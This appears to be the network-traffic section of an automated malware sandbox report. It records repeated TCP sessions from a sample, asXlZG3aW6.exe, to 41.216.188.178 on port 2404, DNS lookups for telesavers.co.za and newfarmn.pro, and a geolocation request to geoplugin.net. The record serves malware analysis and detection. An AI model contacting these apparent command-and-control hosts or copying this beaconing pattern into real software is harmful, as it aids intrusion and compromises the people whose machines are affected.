                                                                                                                                                                                  Oct 8, 2024 16:52:35.812355042 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812383890 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812383890 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812448025 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812500954 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812551022 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812577963 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812637091 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812691927 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812726021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812792063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812892914 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.812989950 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.843827963 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.843911886 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.843965054 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.844162941 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980376959 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980454922 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980516911 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980575085 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980595112 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980631113 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980688095 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980743885 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980798006 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980853081 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980910063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980936050 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.980964899 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981034040 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981122971 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981182098 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981267929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981339931 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981384993 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981478930 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981550932 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981628895 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981628895 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981628895 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981709003 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981771946 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981796026 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981796980 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981846094 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981903076 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981901884 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.981959105 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982013941 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982021093 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982070923 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982121944 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982121944 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982126951 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982182026 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982223988 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982280016 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982296944 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982336998 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982393026 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982446909 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982465029 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982489109 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982640028 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982640982 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.982640982 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983583927 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983695984 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983772993 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983850956 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983920097 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983969927 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.983969927 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984110117 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984138012 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984200001 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984293938 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984360933 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984447956 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984508038 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984539032 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984539986 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984602928 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984671116 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984709978 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984709978 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984709978 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984738111 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984814882 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984877110 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984878063 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984939098 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.984991074 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.985049009 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.985049009 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.985215902 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.985215902 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994193077 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994271040 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994329929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994385958 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994429111 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994529963 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994529963 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994529963 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994738102 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994817972 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994877100 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994935036 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.994990110 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995016098 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995045900 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995104074 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995157957 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995187044 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995187044 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995213032 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995269060 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995322943 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995378971 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995394945 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995395899 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995433092 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995488882 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995543003 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995553017 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995553970 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995553970 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995553970 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995553970 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995599031 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995644093 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995698929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995757103 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995811939 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995837927 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995837927 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995867014 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995923042 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.995976925 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996006966 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996026993 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996085882 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996191025 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996191025 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996191025 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996191978 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996259928 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.996494055 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:36.040709972 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:36.040811062 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:36.040884018 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:36.040951014 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:36.040963888 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041021109 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041090965 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041135073 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041312933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041312933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041312933 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:36.041424036 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.400283098 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.400319099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.400396109 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.581828117 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:39.582036018 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:39.582089901 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.582159996 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:39.582258940 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.582258940 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:39.763736963 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:39.764857054 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:39.774926901 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:39.775170088 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:51.482180119 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:51.483880043 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:51.713325977 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:53:21.510935068 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:53:21.512881041 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:53:21.746349096 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:53:51.556545019 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:53:51.557869911 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:53:51.790334940 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:54:12.625601053 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:13.062968016 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:13.922141075 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:15.640480995 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:19.061604977 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:21.610600948 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:54:21.611958981 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:54:21.846052885 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:54:25.903867006 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:39.572796106 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:54:51.633104086 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:54:51.634355068 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:54:51.867233038 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:55:21.677450895 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:55:21.679202080 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:55:21.913110971 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:55:51.720231056 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:55:51.721342087 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:55:51.958020926 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:21.749273062 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:21.751003027 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:56:21.988982916 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:51.785502911 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:56:51.788352966 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:56:52.020200014 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:21.818101883 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:21.820553064 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:57:22.050735950 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:51.866343975 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:57:51.868998051 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:57:52.095356941 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:21.904393911 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:21.905740976 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:58:22.140665054 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:51.955459118 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:58:51.956671000 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:58:52.186795950 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:21.995789051 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:21.997529030 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:59:22.232938051 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:52.037161112 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:59:52.038372993 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:59:52.262279987 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 17:00:22.058478117 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 17:00:22.058923006 CEST497362404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 17:00:22.293530941 CEST24044973641.216.188.178192.168.11.20

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 8, 2024 16:52:22.640477896 CEST5893953192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 8, 2024 16:52:23.388475895 CEST53589391.1.1.1192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:32.695863008 CEST5538653192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 8, 2024 16:52:32.795903921 CEST53553861.1.1.1192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.024312973 CEST6154253192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 8, 2024 16:52:34.121969938 CEST53615421.1.1.1192.168.11.20

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 8, 2024 16:52:22.640477896 CEST192.168.11.201.1.1.10xbbccStandard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 8, 2024 16:52:32.695863008 CEST192.168.11.201.1.1.10x56aaStandard query (0)newfarmn.proA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 8, 2024 16:52:34.024312973 CEST192.168.11.201.1.1.10xb955Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 8, 2024 16:52:23.388475895 CEST1.1.1.1192.168.11.200xbbccNo error (0)telesavers.co.za102.65.21.26A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 8, 2024 16:52:32.795903921 CEST1.1.1.1192.168.11.200x56aaNo error (0)newfarmn.pro41.216.188.178A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 8, 2024 16:52:34.121969938 CEST1.1.1.1192.168.11.200xb955No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • telesavers.co.za
                                                                                                                                                                                  • geoplugin.net

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.11.2049740178.237.33.50804464C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 8, 2024 16:52:34.293272018 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Oct 8, 2024 16:52:34.468440056 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                                                  date: Tue, 08 Oct 2024 14:52:34 GMT
                                                                                                                                                                                  server: Apache
                                                                                                                                                                                  content-length: 965
                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
